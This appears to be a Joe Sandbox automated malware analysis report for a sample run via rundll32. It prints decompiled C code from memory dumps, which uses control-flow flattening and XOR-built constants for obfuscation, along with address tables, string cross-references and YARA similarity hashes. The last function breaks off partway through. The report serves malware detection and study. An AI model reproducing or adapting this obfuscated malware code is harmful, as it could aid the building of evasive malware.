0x0020af74
0x0020af7b
0x0020af7c
0x0020af84
0x00000000
0x0020adaf
0x0020adaf
0x0020adb5
0x0020af45
0x0020af47
0x0020af4e
0x0020af4f
0x0020af52
0x00000000
0x0020adbb
0x0020adbb
0x0020adc1
0x0020aed6
0x0020aedd
0x0020aeeb
0x0020af01
0x0020af08
0x0020af0d
0x0020af12
0x0020af1a
0x00000000
0x0020adc7
0x0020adc7
0x0020adcd
0x0020aebd
0x0020aec2
0x0020aec5
0x00000000
0x0020add3
0x0020add3
0x0020add9
0x00000000
0x0020addf
0x0020addf
0x0020ade4
0x0020ae56
0x0020ae78
0x0020ae82
0x0020ae85
0x0020ae91
0x00000000
0x0020ae91
0x0020add9
0x0020adcd
0x0020adc1
0x0020adb5
0x0020ada9
0x0020ad9d
0x00000000
0x0020ad91

Strings

}G, xrefs: 0020A911
!", xrefs: 0020A984
}&, xrefs: 0020A3DE
dg, xrefs: 0020A491
H{, xrefs: 00209E25
15, xrefs: 0020A054
d/<, xrefs: 0020AA53
#oJ9, xrefs: 0020ADD3
;d, xrefs: 0020A1BD
"s, xrefs: 0020A38E
d/<, xrefs: 0020AC44
DM, xrefs: 0020A5B1
l8, xrefs: 0020A0E4
b-, xrefs: 0020A53E
De, xrefs: 0020A841
m, xrefs: 0020A07A
, xrefs: 00209F74
)?, xrefs: 0020A676
}, xrefs: 0020A514
/, xrefs: 0020A3B7
.v, xrefs: 00209F5A
8, xrefs: 0020A36D
%, xrefs: 0020A6A7
2b, xrefs: 00209EDA

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: /$ $!"$"s$#oJ9$)?$.v$15$2b$8$;d$DM$De$H{$b-$d/<$d/<$dg$l8$m$}&$}G$}$%
API String ID: 0-2457962065
Opcode ID: 93cf55d32a114cae9e9fbf4ce09ca8e014b3a3b8239e17535a825ed5be71d270
Instruction ID: 20ef6251d950b8dbab193864a63fdabc338a8e79845d93e6ec82c42cd21d84af
Opcode Fuzzy Hash: 93cf55d32a114cae9e9fbf4ce09ca8e014b3a3b8239e17535a825ed5be71d270
Instruction Fuzzy Hash: 22921371509381CFE378CF25C989B9BBBE1BBD4308F10891DE18A862A1C7B59959CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00202965, Relevance: 26.8, Strings: 21, Instructions: 559
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E00202965(intOrPtr __ecx, signed int __edx) {
				char _v524;
				char _v1044;
				char _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				signed int _v1576;
				intOrPtr _v1580;
				char _v1584;
				intOrPtr _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				signed int _v1796;
				signed int _v1800;
				signed int _v1804;
				signed int _v1808;
				signed int _v1812;
				signed int _v1816;
				signed int _v1820;
				signed int _v1824;
				void* _t616;
				void* _t617;
				signed int _t631;
				signed int _t636;
				signed int _t638;
				signed int _t643;
				signed int _t653;
				signed int _t654;
				signed int _t655;
				signed int _t656;
				signed int _t657;
				signed int _t658;
				signed int _t659;
				signed int _t660;
				signed int _t661;
				signed int _t662;
				signed int _t663;
				signed int _t664;
				signed int _t665;
				signed int _t675;
				void* _t676;
				void* _t681;
				signed int _t731;
				signed int _t732;
				signed int _t733;
				signed int _t734;
				signed int _t737;
				void* _t739;
				void* _t740;
				void* _t742;

				_v1592 = __edx;
				_v1588 = __ecx;
				_v1600 = 0x81a2;
				_v1600 = _v1600 * 0x51;
				_t734 = 0x149dffe6;
				_v1600 = _v1600 ^ 0x0029046b;
				_v1820 = 0xa317;
				_t731 = 0x6d;
				_v1820 = _v1820 / _t731;
				_v1820 = _v1820 | 0xb0bf28c0;
				_v1820 = _v1820 << 8;
				_v1820 = _v1820 ^ 0xbf29f1c0;
				_v1644 = 0x87c;
				_v1644 = _v1644 << 4;
				_v1644 = _v1644 ^ 0x00008950;
				_v1656 = 0xaf72;
				_v1656 = _v1656 ^ 0xf8536856;
				_v1656 = _v1656 ^ 0xf853f78b;
				_v1720 = 0x2378;
				_t653 = 0x12;
				_v1720 = _v1720 * 0x77;
				_v1720 = _v1720 ^ 0x64312f2b;
				_v1720 = _v1720 ^ 0x642133c7;
				_v1804 = 0xea19;
				_v1804 = _v1804 + 0xffff5808;
				_v1804 = _v1804 << 0x10;
				_v1804 = _v1804 * 0x6f;
				_v1804 = _v1804 ^ 0xac4f53f6;
				_v1748 = 0x9778;
				_v1748 = _v1748 << 7;
				_v1748 = _v1748 ^ 0x598ba3f9;
				_v1748 = _v1748 + 0x8ff6;
				_v1748 = _v1748 ^ 0x59c0ab27;
				_v1664 = 0x881f;
				_v1664 = _v1664 >> 0xa;
				_v1664 = _v1664 | 0x5b999195;
				_v1664 = _v1664 ^ 0x5b999b93;
				_v1728 = 0x74b1;
				_v1728 = _v1728 ^ 0x6074f824;
				_v1728 = _v1728 >> 0xd;
				_v1728 = _v1728 ^ 0x00031884;
				_v1628 = 0x3039;
				_v1628 = _v1628 / _t653;
				_v1628 = _v1628 ^ 0x00006384;
				_v1736 = 0xc64f;
				_t654 = 0x5c;
				_v1736 = _v1736 / _t654;
				_v1736 = _v1736 | 0xd5a0b868;
				_v1736 = _v1736 ^ 0xd5a0f550;
				_v1724 = 0xb856;
				_v1724 = _v1724 + 0x47b5;
				_v1724 = _v1724 * 0x2a;
				_v1724 = _v1724 ^ 0x002a3a18;
				_v1824 = 0x8351;
				_v1824 = _v1824 + 0x81f5;
				_v1824 = _v1824 + 0xe517;
				_v1824 = _v1824 << 2;
				_v1824 = _v1824 ^ 0x0007a51f;
				_v1740 = 0xf66b;
				_v1740 = _v1740 + 0xffff1308;
				_v1740 = _v1740 << 6;
				_v1740 = _v1740 ^ 0x0002750a;
				_v1792 = 0x9fd9;
				_v1792 = _v1792 + 0x4b8e;
				_v1792 = _v1792 + 0xffff2f9e;
				_v1792 = _v1792 >> 0xf;
				_v1792 = _v1792 ^ 0x00003a08;
				_v1800 = 0x966c;
				_v1800 = _v1800 ^ 0x8d45c2e0;
				_v1800 = _v1800 ^ 0x65a85158;
				_v1800 = _v1800 + 0xffff603c;
				_v1800 = _v1800 ^ 0xe8ec61cf;
				_v1716 = 0x4029;
				_t655 = 0x60;
				_v1716 = _v1716 / _t655;
				_v1716 = _v1716 ^ 0x86a261cb;
				_v1716 = _v1716 ^ 0x86a2059f;
				_v1808 = 0xe8e3;
				_v1808 = _v1808 / _t731;
				_v1808 = _v1808 + 0x483f;
				_v1808 = _v1808 ^ 0xbcef0a4e;
				_v1808 = _v1808 ^ 0xbcef6349;
				_v1816 = 0x6f91;
				_v1816 = _v1816 + 0xffff8468;
				_t732 = 0x34;
				_t656 = 0x29;
				_v1816 = _v1816 * 0x33;
				_v1816 = _v1816 << 7;
				_v1816 = _v1816 ^ 0xfecd495c;
				_v1640 = 0xa61;
				_v1640 = _v1640 >> 0xd;
				_v1640 = _v1640 ^ 0x00004d64;
				_v1648 = 0x609b;
				_v1648 = _v1648 + 0xae34;
				_v1648 = _v1648 ^ 0x00012005;
				_v1616 = 0x313f;
				_v1616 = _v1616 + 0xf40e;
				_v1616 = _v1616 ^ 0x0001621e;
				_v1680 = 0xad27;
				_v1680 = _v1680 ^ 0x11741994;
				_v1680 = _v1680 ^ 0x828bebc7;
				_v1680 = _v1680 ^ 0x93ff4a0d;
				_v1704 = 0x2eca;
				_v1704 = _v1704 << 3;
				_v1704 = _v1704 + 0xffff4fca;
				_v1704 = _v1704 ^ 0x0000afdc;
				_v1672 = 0xb5e9;
				_v1672 = _v1672 / _t732;
				_v1672 = _v1672 | 0x3cbbe239;
				_v1672 = _v1672 ^ 0x3cbbda4d;
				_v1760 = 0x653d;
				_v1760 = _v1760 ^ 0x5e29d2db;
				_v1760 = _v1760 / _t656;
				_v1760 = _v1760 * 0x30;
				_v1760 = _v1760 ^ 0x6e3d0fd3;
				_v1768 = 0xee4d;
				_v1768 = _v1768 + 0xffff4943;
				_v1768 = _v1768 * 0x23;
				_v1768 = _v1768 | 0x6650922d;
				_v1768 = _v1768 ^ 0x6657f47d;
				_v1620 = 0x4442;
				_v1620 = _v1620 << 0xa;
				_v1620 = _v1620 ^ 0x01114709;
				_v1752 = 0x70f3;
				_v1752 = _v1752 + 0xc573;
				_v1752 = _v1752 ^ 0x8bd692b9;
				_v1752 = _v1752 + 0x375f;
				_v1752 = _v1752 ^ 0x8bd7cab9;
				_v1692 = 0x8d49;
				_v1692 = _v1692 | 0xadf95343;
				_t657 = 0x6f;
				_v1692 = _v1692 / _t657;
				_v1692 = _v1692 ^ 0x01915aad;
				_v1608 = 0x9445;
				_v1608 = _v1608 ^ 0xfa8556cd;
				_v1608 = _v1608 ^ 0xfa8587ad;
				_v1596 = 0xa356;
				_v1596 = _v1596 ^ 0x020e3d0f;
				_v1596 = _v1596 ^ 0x020eaa39;
				_v1668 = 0x9fc9;
				_v1668 = _v1668 << 1;
				_v1668 = _v1668 + 0xffff5705;
				_v1668 = _v1668 ^ 0x0000873c;
				_v1676 = 0x5aa4;
				_t658 = 0x57;
				_v1676 = _v1676 * 0xd;
				_t659 = 0x74;
				_v1676 = _v1676 / _t658;
				_v1676 = _v1676 ^ 0x000044cc;
				_v1684 = 0x6a20;
				_v1684 = _v1684 << 5;
				_v1684 = _v1684 + 0xffff5b62;
				_v1684 = _v1684 ^ 0x000ca81d;
				_v1652 = 0xc97c;
				_v1652 = _v1652 >> 5;
				_v1652 = _v1652 ^ 0x00002e12;
				_v1696 = 0x481c;
				_v1696 = _v1696 << 5;
				_v1696 = _v1696 << 0xf;
				_v1696 = _v1696 ^ 0x81c0713e;
				_v1732 = 0x6e12;
				_v1732 = _v1732 + 0x239d;
				_v1732 = _v1732 << 0xe;
				_v1732 = _v1732 ^ 0x246bc9a9;
				_v1812 = 0x8d84;
				_v1812 = _v1812 << 7;
				_v1812 = _v1812 ^ 0x627ea561;
				_v1812 = _v1812 + 0xffffb69b;
				_v1812 = _v1812 ^ 0x623827c0;
				_v1612 = 0x2459;
				_v1612 = _v1612 * 0x5f;
				_v1612 = _v1612 ^ 0x000d4756;
				_v1780 = 0x3738;
				_v1780 = _v1780 >> 0xf;
				_v1780 = _v1780 + 0x7756;
				_t660 = 0x49;
				_v1780 = _v1780 / _t659;
				_v1780 = _v1780 ^ 0x00004d7c;
				_v1604 = 0xa6e8;
				_v1604 = _v1604 >> 0xb;
				_v1604 = _v1604 ^ 0x00007121;
				_v1700 = 0x3aaa;
				_v1700 = _v1700 * 0x35;
				_v1700 = _v1700 | 0x9258fa78;
				_v1700 = _v1700 ^ 0x925ce803;
				_v1776 = 0xc1a7;
				_v1776 = _v1776 | 0xe727275b;
				_t347 =  &_v1776; // 0xe727275b
				_v1776 =  *_t347 / _t660;
				_v1776 = _v1776 | 0x34b38de4;
				_v1776 = _v1776 ^ 0x37bb8fe4;
				_v1784 = 0x91c3;
				_t661 = 0x64;
				_v1784 = _v1784 / _t661;
				_v1784 = _v1784 + 0x788e;
				_v1784 = _v1784 / _t732;
				_v1784 = _v1784 ^ 0x000026f9;
				_v1756 = 0xe29b;
				_v1756 = _v1756 << 5;
				_v1756 = _v1756 >> 9;
				_t662 = 0x21;
				_v1756 = _v1756 / _t662;
				_v1756 = _v1756 ^ 0x00004ef7;
				_v1796 = 0x179;
				_v1796 = _v1796 + 0x7a5c;
				_v1796 = _v1796 | 0xddf9ffa6;
				_v1796 = _v1796 ^ 0xddf99719;
				_v1688 = 0xa45d;
				_t663 = 0x17;
				_v1688 = _v1688 / _t663;
				_v1688 = _v1688 ^ 0xa9b19ce5;
				_v1688 = _v1688 ^ 0xa9b19a72;
				_v1772 = 0x6fb4;
				_v1772 = _v1772 << 9;
				_v1772 = _v1772 >> 0xb;
				_v1772 = _v1772 >> 4;
				_v1772 = _v1772 ^ 0x0000531d;
				_v1636 = 0x1eab;
				_v1636 = _v1636 | 0x295ec68a;
				_v1636 = _v1636 ^ 0x295ec908;
				_v1712 = 0x5da6;
				_v1712 = _v1712 ^ 0x5fdaae01;
				_v1712 = _v1712 ^ 0xdf7664b8;
				_v1712 = _v1712 ^ 0x80ac9034;
				_v1764 = 0x8aec;
				_t664 = 0x4b;
				_v1764 = _v1764 / _t664;
				_t665 = 0x45;
				_v1764 = _v1764 * 0x5a;
				_v1764 = _v1764 * 0x7e;
				_v1764 = _v1764 ^ 0x0052267c;
				_v1788 = 0x22ed;
				_v1788 = _v1788 + 0xffffcd0d;
				_v1788 = _v1788 * 0x72;
				_v1788 = _v1788 << 0xc;
				_v1788 = _v1788 ^ 0x8dd516dd;
				_v1744 = 0x24eb;
				_v1744 = _v1744 ^ 0x0b5c0f43;
				_v1744 = _v1744 ^ 0xa1a0b70d;
				_v1744 = _v1744 / _t665;
				_v1744 = _v1744 ^ 0x027a3009;
				_v1624 = 0x7660;
				_v1624 = _v1624 ^ 0x00000e09;
				_v1632 = 0x758c;
				_v1632 = _v1632 << 0xa;
				_v1632 = _v1632 ^ 0x01d672ff;
				_v1660 = 0x7b50;
				_v1660 = _v1660 >> 1;
				_v1660 = _v1660 >> 3;
				_v1660 = _v1660 ^ 0x000037ef;
				_v1708 = 0x99fa;
				_v1708 = _v1708 ^ 0xe57d132d;
				_v1708 = _v1708 ^ 0x77fb962a;
				_v1708 = _v1708 ^ 0x92961cfd;
				_t616 = E002045F8();
				_t733 = _v1592;
				_t739 = _t616;
				_t651 = _v1592;
				while(1) {
					L1:
					_t617 = 0x2cd60113;
					do {
						while(1) {
							L2:
							_t742 = _t734 - 0x1e5e78f1;
							if(_t742 > 0) {
								break;
							}
							if(_t742 == 0) {
								_t636 = E001FD0DE(_v1584, _v1616, _v1680, _v1704, _v1672, _v1580);
								_t651 = _t636;
								_t740 = _t740 + 0x10;
								__eflags = _t636;
								_t617 = 0x2cd60113;
								_t734 =  !=  ? 0x2cd60113 : 0x12daf843;
								continue;
							}
							if(_t734 == 0x178ada5) {
								 *((intOrPtr*)(_t733 + 0x20)) = _v1588;
								_t638 =  *0x211400; // 0x0
								 *(_t733 + 0x10) = _t638;
								 *0x211400 = _t733;
								return _t638;
							}
							if(_t734 == 0x2a95541) {
								_t675 = _v1576;
								E001F78F0(_t675, _v1636, _v1712, _v1764, _v1788);
								_t740 = _t740 + 0xc;
								_t734 = 0x178ada5;
								while(1) {
									L1:
									_t617 = 0x2cd60113;
									goto L2;
								}
							}
							if(_t734 == 0x12daf843) {
								_t675 = _v1756;
								E001F91CD(_t675, _v1796, _v1688, _v1584, _v1772);
								_t740 = _t740 + 0xc;
								_t734 = 0x2a95541;
								while(1) {
									L1:
									_t617 = 0x2cd60113;
									goto L2;
								}
							}
							if(_t734 != 0x149dffe6) {
								if(_t734 == 0x178c8cba) {
									_push( &_v1044);
									E001F2628(_v1588, _v1592);
									asm("sbb esi, esi");
									_t675 = 0x1f12f8;
									_t737 = _t734 & 0x16fb7084;
									__eflags = _t737;
									L12:
									_t734 = _t737 + 0x22b4e350;
									while(1) {
										L1:
										_t617 = 0x2cd60113;
										goto L2;
									}
								} else {
									_t748 = _t734 - 0x1a9938f9;
									if(_t734 != 0x1a9938f9) {
										goto L28;
									} else {
										_push(_v1780);
										_push(1);
										_push( &_v524);
										_push(_t675);
										_push(_v1612);
										_push(_v1812);
										_t675 = _v1696;
										_push(0);
										_push(0);
										E002089F6(_t675, _v1732, _t748);
										_t740 = _t740 + 0x20;
										_t734 = 0x32f46056;
										while(1) {
											L1:
											_t617 = 0x2cd60113;
											goto L2;
										}
									}
								}
							}
							_t676 = 0x24;
							_t643 = E002057E8(_t676);
							_t733 = _t643;
							_t675 = _t675;
							__eflags = _t733;
							if(_t733 != 0) {
								_push(_t675);
								E001F1D54(_v1720, _t675, _v1804, _v1748, _v1664,  &_v1564, _v1728, _v1600);
								_t740 = _t740 + 0x20;
								_t734 = 0x178c8cba;
								while(1) {
									L1:
									_t617 = 0x2cd60113;
									goto L2;
								}
							}
							return _t643;
							L32:
						}
						__eflags = _t734 - 0x22b4e350;
						if(_t734 == 0x22b4e350) {
							E001F91CD(_v1744, _v1624, _v1632, _t733, _v1660);
							_t740 = _t740 + 0xc;
							_t734 = 0xf568d32;
							_t617 = 0x2cd60113;
							goto L28;
						} else {
							__eflags = _t734 - 0x23197851;
							if(_t734 == 0x23197851) {
								E00201B71( &_v1576, _v1640,  &_v1584, _v1648);
								asm("sbb esi, esi");
								_t734 = (_t734 & 0x1bb523b0) + 0x2a95541;
								goto L1;
							} else {
								__eflags = _t734 - _t617;
								if(__eflags == 0) {
									_push(0x1f13a8);
									_push(_v1620);
									E002064EC(_t651, __eflags, E0020BF25(_v1760, _v1768, __eflags), _v1752, 0x104,  &_v1044,  &_v1564, _v1692, _v1608, _v1596);
									E0020C5F7(_v1668, _v1676, _v1684, _v1652, _t622);
									_t740 = _t740 + 0x34;
									_t734 = 0x1a9938f9;
									while(1) {
										L1:
										_t617 = 0x2cd60113;
										goto L2;
									}
								} else {
									__eflags = _t734 - 0x32f46056;
									if(_t734 == 0x32f46056) {
										E001F91CD(_v1604, _v1700, _v1776, _t651, _v1784);
										_t740 = _t740 + 0xc;
										_t734 = 0x12daf843;
										while(1) {
											L1:
											_t617 = 0x2cd60113;
											goto L2;
										}
									} else {
										__eflags = _t734 - 0x39b053d4;
										if(_t734 != 0x39b053d4) {
											goto L28;
										} else {
											_v1572 = E001F9295();
											_t631 = E0020BBAB(_v1724, _v1824, _t630, _v1740);
											_pop(_t681);
											_v1568 = 2 + _t631 * 2;
											_t675 = _v1792;
											E0020C353(_t675, _v1708, _v1800, _t739,  &_v1576, _t681, _v1716, _t681, _t739, _t739, _v1808, _v1816);
											_t740 = _t740 + 0x28;
											asm("sbb esi, esi");
											_t737 = _t734 & 0x00649501;
											goto L12;
										}
									}
								}
							}
						}
						goto L32;
						L28:
						__eflags = _t734 - 0xf568d32;
					} while (__eflags != 0);
					return _t617;
				}
			}

0x0020296f
0x00202976
0x0020297d
0x00202990
0x00202997
0x0020299c
0x002029a7
0x002029b7
0x002029bc
0x002029c2
0x002029ca
0x002029cf
0x002029d7
0x002029e2
0x002029ea
0x002029f5
0x00202a00
0x00202a0b
0x00202a16
0x00202a29
0x00202a2c
0x00202a33
0x00202a3e
0x00202a49
0x00202a51
0x00202a59
0x00202a63
0x00202a67
0x00202a6f
0x00202a77
0x00202a7c
0x00202a84
0x00202a8c
0x00202a94
0x00202a9f
0x00202aa7
0x00202ab2
0x00202abd
0x00202ac5
0x00202acd
0x00202ad2
0x00202ada
0x00202af0
0x00202af7
0x00202b02
0x00202b0e
0x00202b11
0x00202b15
0x00202b1d
0x00202b25
0x00202b2d
0x00202b3a
0x00202b3e
0x00202b46
0x00202b4e
0x00202b56
0x00202b5e
0x00202b63
0x00202b6b
0x00202b73
0x00202b7b
0x00202b80
0x00202b8a
0x00202b92
0x00202b9a
0x00202ba2
0x00202ba7
0x00202baf
0x00202bb7
0x00202bbf
0x00202bc7
0x00202bcf
0x00202bd7
0x00202beb
0x00202bf0
0x00202bf7
0x00202c02
0x00202c0d
0x00202c1d
0x00202c23
0x00202c2b
0x00202c33
0x00202c3b
0x00202c43
0x00202c50
0x00202c53
0x00202c54
0x00202c58
0x00202c5d
0x00202c65
0x00202c70
0x00202c78
0x00202c83
0x00202c8e
0x00202c99
0x00202ca4
0x00202caf
0x00202cba
0x00202cc5
0x00202cd0
0x00202cdb
0x00202ce6
0x00202cf1
0x00202cfc
0x00202d04
0x00202d0f
0x00202d1a
0x00202d30
0x00202d37
0x00202d42
0x00202d4d
0x00202d55
0x00202d63
0x00202d6c
0x00202d70
0x00202d78
0x00202d80
0x00202d8d
0x00202d91
0x00202d99
0x00202da1
0x00202dac
0x00202db4
0x00202dbf
0x00202dc7
0x00202dd1
0x00202dd9
0x00202de1
0x00202de9
0x00202df4
0x00202e08
0x00202e0d
0x00202e16
0x00202e21
0x00202e2c
0x00202e37
0x00202e42
0x00202e4d
0x00202e58
0x00202e63
0x00202e6e
0x00202e75
0x00202e80
0x00202e8b
0x00202e9e
0x00202ea1
0x00202eb1
0x00202eb2
0x00202ebb
0x00202ec6
0x00202ed1
0x00202ed9
0x00202ee4
0x00202eef
0x00202efa
0x00202f02
0x00202f0d
0x00202f18
0x00202f20
0x00202f28
0x00202f33
0x00202f3b
0x00202f43
0x00202f48
0x00202f50
0x00202f58
0x00202f5d
0x00202f65
0x00202f6d
0x00202f75
0x00202f8a
0x00202f91
0x00202f9c
0x00202fa4
0x00202fa9
0x00202fb7
0x00202fb8
0x00202fbc
0x00202fc4
0x00202fcf
0x00202fd7
0x00202fe2
0x00202ff5
0x00202ffc
0x00203007
0x00203012
0x0020301a
0x00203024
0x0020302c
0x00203030
0x00203038
0x00203040
0x0020304e
0x00203053
0x00203057
0x00203067
0x0020306d
0x00203075
0x0020307d
0x00203082
0x0020308b
0x00203090
0x00203096
0x0020309e
0x002030a6
0x002030ae
0x002030b6
0x002030be
0x002030d0
0x002030d5
0x002030de
0x002030e9
0x002030f4
0x002030fc
0x00203101
0x00203106
0x0020310b
0x00203113
0x0020311e
0x00203129
0x00203134
0x0020313f
0x0020314a
0x00203155
0x00203160
0x0020316c
0x00203171
0x0020317c
0x0020317d
0x00203186
0x0020318a
0x00203192
0x0020319a
0x002031a7
0x002031ab
0x002031b0
0x002031b8
0x002031c0
0x002031c8
0x002031d6
0x002031da
0x002031e2
0x002031fb
0x00203206
0x00203211
0x00203219
0x00203224
0x0020322f
0x00203236
0x0020323e
0x00203249
0x00203254
0x0020325f
0x0020326a
0x00203279
0x0020327e
0x00203285
0x00203287
0x0020328e
0x0020328e
0x0020328e
0x00203293
0x00203293
0x00203293
0x00203293
0x00203299
0x00000000
0x00000000
0x0020329f
0x00203442
0x00203447
0x00203449
0x0020344c
0x00203453
0x00203458
0x00000000
0x00203458
0x002032ab
0x0020363d
0x00203640
0x00203645
0x00203648
0x00000000
0x00203648
0x002032b7
0x002033ff
0x00203406
0x0020340b
0x0020340e
0x0020328e
0x0020328e
0x0020328e
0x00000000
0x0020328e
0x0020328e
0x002032c3
0x002033d3
0x002033d7
0x002033dc
0x002033df
0x0020328e
0x0020328e
0x0020328e
0x00000000
0x0020328e
0x0020328e
0x002032cf
0x002032db
0x0020333c
0x00203342
0x0020334a
0x0020334c
0x0020334d
0x0020334d
0x00203353
0x00203353
0x0020328e
0x0020328e
0x0020328e
0x00000000
0x0020328e
0x002032dd
0x002032dd
0x002032e3
0x00000000
0x002032e9
0x002032e9
0x002032f4
0x002032f6
0x002032f7
0x002032f8
0x002032ff
0x0020330a
0x00203311
0x00203313
0x00203315
0x0020331a
0x0020331d
0x0020328e
0x0020328e
0x0020328e
0x00000000
0x0020328e
0x0020328e
0x002032e3
0x002032db
0x0020336f
0x00203370
0x00203375
0x00203377
0x00203378
0x0020337a
0x00203380
0x002033ab
0x002033b0
0x002033b3
0x0020328e
0x0020328e
0x0020328e
0x00000000
0x0020328e
0x0020328e
0x00203658
0x00000000
0x00203658
0x00203460
0x00203466
0x00203616
0x0020361b
0x0020361e
0x00203623
0x00000000
0x0020346c
0x0020346c
0x00203472
0x002035e0
0x002035e8
0x002035f1
0x00000000
0x00203478
0x00203478
0x0020347a
0x0020353c
0x00203541
0x0020358f
0x002035b1
0x002035b6
0x002035b9
0x0020328e
0x0020328e
0x0020328e
0x00000000
0x0020328e
0x00203480
0x00203480
0x00203486
0x0020352a
0x0020352f
0x00203532
0x0020328e
0x0020328e
0x0020328e
0x00000000
0x0020328e
0x0020348c
0x0020348c
0x00203492
0x00000000
0x00203498
0x002034b5
0x002034bc
0x002034c2
0x002034d2
0x002034f8
0x002034fc
0x00203501
0x00203506
0x00203508
0x00000000
0x00203508
0x00203492
0x00203486
0x0020347a
0x00203472
0x00000000
0x00203628
0x00203628
0x00203628
0x00000000
0x00203293

Strings

=e, xrefs: 00202D4D
dM, xrefs: 00202C78
\z, xrefs: 002030A6
+/1d, xrefs: 00202A33
$, xrefs: 002031B8
!q, xrefs: 00202FD7
)@, xrefs: 00202BD7
|&R, xrefs: 0020318A
_7, xrefs: 00202DD9
|M, xrefs: 00202FBC
['', xrefs: 00203024
?1, xrefs: 00202CA4
Y$, xrefs: 00202F75
", xrefs: 00203192
BD, xrefs: 00202DA1
j, xrefs: 00202EC6
7, xrefs: 0020323E
M, xrefs: 00202D78
?H, xrefs: 00202C23
VG, xrefs: 00202F91
`v, xrefs: 002031E2

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: j$!q$)@$+/1d$=e$?1$?H$BD$M$VG$Y$$[''$\z$_7$`v$dM$|&R$|M$"$$$7
API String ID: 1514166925-3565163747
Opcode ID: 18b5c805911f8d62d93a524e49f72534c1499c9b946773a612794d358947685d
Instruction ID: 4277660a8dcd4dabd4a980a93b294907d5e63c69387dfc2009690fbc1780811f
Opcode Fuzzy Hash: 18b5c805911f8d62d93a524e49f72534c1499c9b946773a612794d358947685d
Instruction Fuzzy Hash: 1B520D715093818FE378CF65C54AB8BBBE2BBC4704F10891EE6D9862A0D7B59909CF53

Uniqueness

Uniqueness Score: -1.00%

Function 002A1ED9, Relevance: 26.8, Strings: 21, Instructions: 559COMMON

Download Yara Rule

Strings

", xrefs: 002A2706
['', xrefs: 002A2598
=e, xrefs: 002A22C1
M, xrefs: 002A22EC
Y$, xrefs: 002A24E9
VG, xrefs: 002A2505
|&R, xrefs: 002A26FE
+/1d, xrefs: 002A1FA7
_7, xrefs: 002A234D
)@, xrefs: 002A214B
j, xrefs: 002A243A
?H, xrefs: 002A2197
!q, xrefs: 002A254B
7, xrefs: 002A27B2
`v, xrefs: 002A2756
|M, xrefs: 002A2530
$, xrefs: 002A272C
dM, xrefs: 002A21EC
BD, xrefs: 002A2315
?1, xrefs: 002A2218
\z, xrefs: 002A261A

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: j$!q$)@$+/1d$=e$?1$?H$BD$M$VG$Y$$[''$\z$_7$`v$dM$|&R$|M$"$$$7
API String ID: 0-3565163747
Opcode ID: 07f3b0479bf2ce80913df2421b283bfd8da05bebef12a968094a8de62af476e7
Instruction ID: 674f5a7467eacf34504fde734f393e77da9b2ca0cefe17566f5daf53146cbe04
Opcode Fuzzy Hash: 07f3b0479bf2ce80913df2421b283bfd8da05bebef12a968094a8de62af476e7
Instruction Fuzzy Hash: 59520E71508381CFE378CF65C54AB8BBBE1BB85704F10891EE5D9862A0DBB99809CF53

Uniqueness

Uniqueness Score: -1.00%

Function 001F4EA1, Relevance: 24.1, Strings: 19, Instructions: 375
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E001F4EA1(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				char _v524;
				char _v1044;
				short _v1588;
				short _v1590;
				char _v1592;
				signed int _v1636;
				signed int _v1640;
				intOrPtr _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				signed int _v1796;
				signed int _v1800;
				void* _t372;
				signed int _t400;
				signed int _t403;
				void* _t404;
				signed int _t407;
				void* _t410;
				void* _t416;
				signed int _t420;
				void* _t423;
				void* _t429;
				void* _t457;
				signed int _t468;
				signed int _t470;
				signed int _t471;
